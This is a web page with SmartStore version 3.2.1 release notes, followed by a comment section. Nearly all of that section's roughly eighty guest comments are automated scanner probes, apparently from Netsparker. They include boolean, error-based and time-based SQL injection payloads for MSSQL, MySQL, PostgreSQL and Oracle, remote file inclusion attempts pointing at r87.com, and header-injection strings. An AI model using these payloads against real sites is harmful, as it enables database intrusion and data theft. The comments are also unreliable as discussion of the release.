Monday, May 27, 2019

SmartStore version 3.2.1

Improvements

  • Implemented file range support for CachedFileResult
  • Sitemap should only include products visible for current customer, which is the search engine system customer
  • Fixed uniform spelling for query string parameter "returnUrl"
  • Fixed search engine issue (itemtype, "offers" required) on product detail page
  • Summernote: solved html formatting issues thanks to "Beautifier" library
  • Media middleware: simplified ETag generation & handling

Bugfixes

  • Mega Menu: Product rotator wasn't working
  • Tiny Image: Fixed periodic IOException
  • URL Rewriter: performance optimization
  • Fixed more menu for main catalog navigation
  • Fixed DateTime nor expressed as UTC in AzureFile & LocalFile
  • Content Slider: Fixed slide display bug on surface and other touch devices
  • Content Slider: Randomize slides > Value was stored in database but toggle button has always shown "off"
  • Page Builder: Fixed slider bug for list blocks (brand, category, products) in Firefox
  • Page Builder: fixes blurry background images in IOS
  • Output Cache: action widgets didn't render when they were part of a widgetzone within a donut child action
  • Multishop resolution failed under certain circumstances
  • Fixed menu issue "collection was modified, enumeration operation may not execute"
  • Fixed "The parameters dictionary contains a null entry for parameter 'catId' of non-nullable type 'System.Int32'"
  • Fixed discount coupon sometimes wasn't applied
  • Fixed "Value cannot be null. Parameter name: key" in order list
  • Fixed topic link resolving by system name in multistore environment
  • Async event consumers were not guaranteed to be awaited
Leave your comment

Comments (83)

G
2 months ago | Guest
3


3

G
2 months ago | Guest
3

3

G
2 months ago | Guest
3

hTTp://r87.com/n

G
2 months ago | Guest
3

http://r87.com/n?.php

G
2 months ago | Guest
3

http://r87.com/n?.php

G
2 months ago | Guest
3


ns:netsparker056650=vuln

G
2 months ago | Guest
3

php://filter//resource=http://r87.com/n?.php

G
2 months ago | Guest
3

r87.com/n

G
2 months ago | Guest
3

http://example.com/?
ns: netsparker056650=vuln

G
2 months ago | Guest
3

ns:netsparker056650=vuln

G
2 months ago | Guest
3


ns:netsparker056650=vuln

G
2 months ago | Guest
3

1 OR 1=1

G
2 months ago | Guest
3

1 OR 1=1

G
2 months ago | Guest
3

'

G
2 months ago | Guest
3

NS
NO

G
2 months ago | Guest
3


AND 'NS='ss

G
2 months ago | Guest
3


' OR 1=1 OR 'ns'='ns

G
2 months ago | Guest
3

1 OR 17-7=10

G
2 months ago | Guest
3


OR X='ss

G
2 months ago | Guest
3


' OR 1=1 OR '1'='1

G
2 months ago | Guest
3


' OR 1=1 OR '1'='1

G
2 months ago | Guest
3

1 OR 1=1

G
2 months ago | Guest
3

1 OR 1=1

G
2 months ago | Guest
3

'

G
2 months ago | Guest
3

NS
NO

G
2 months ago | Guest
3

%27

G
2 months ago | Guest
3

(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

G
2 months ago | Guest
3


AND 'NS='ss

G
2 months ago | Guest
3

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

G
2 months ago | Guest
3


' OR 1=1 OR 'ns'='ns

G
2 months ago | Guest
3

convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

G
2 months ago | Guest
3

1 OR 17-7=10

G
2 months ago | Guest
3

'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

G
2 months ago | Guest
3


OR X='ss

G
2 months ago | Guest
3

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

G
2 months ago | Guest
3


' OR 1=1 OR '1'='1

G
2 months ago | Guest
3

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

G
2 months ago | Guest
3


' OR 1=1 OR '1'='1

G
2 months ago | Guest
3

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

G
2 months ago | Guest
3

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

G
2 months ago | Guest
3

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

G
2 months ago | Guest
3

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

G
2 months ago | Guest
3

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

G
2 months ago | Guest
3

NSFTW

G
2 months ago | Guest
3

'+NSFTW+'

G
2 months ago | Guest
3

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

G
2 months ago | Guest
3

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

G
2 months ago | Guest
3

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1

G
2 months ago | Guest
3

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

G
2 months ago | Guest
3

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

G
2 months ago | Guest
3

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

G
2 months ago | Guest
3

'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

G
2 months ago | Guest
3

' WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

1 WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

1) WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

') WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

')) WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

1)) WAITFOR DELAY '0:0:25'--

G
2 months ago | Guest
3

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
2 months ago | Guest
3

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
2 months ago | Guest
3

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
2 months ago | Guest
3

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
2 months ago | Guest
3


+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/

G
2 months ago | Guest
3

-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1

G
2 months ago | Guest
3

((select sleep(25)))a-- 1

G
2 months ago | Guest
3

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

G
2 months ago | Guest
3

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

G
2 months ago | Guest
3

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

G
2 months ago | Guest
3


';SELECT pg_sleep(25)--

G
2 months ago | Guest
3


;SELECT pg_sleep(25)--

G
2 months ago | Guest
3

SELECT pg_sleep(25)--

G
2 months ago | Guest
3


);SELECT pg_sleep(25)--

G
2 months ago | Guest
3


');SELECT pg_sleep(25)--

G
2 months ago | Guest
3


'));SELECT pg_sleep(25)--

G
2 months ago | Guest
3


));SELECT pg_sleep(25)--

G
2 months ago | Guest
3

((SELECT 1 FROM (SELECT SLEEP(25))A))

G
2 months ago | Guest
3

'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

G
2 months ago | Guest
3

-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

G
2 months ago | Guest
3

-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))

G
2 months ago | Guest
3

-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"

G
2 months ago | Guest
3


3

G
2 months ago | Guest
3

3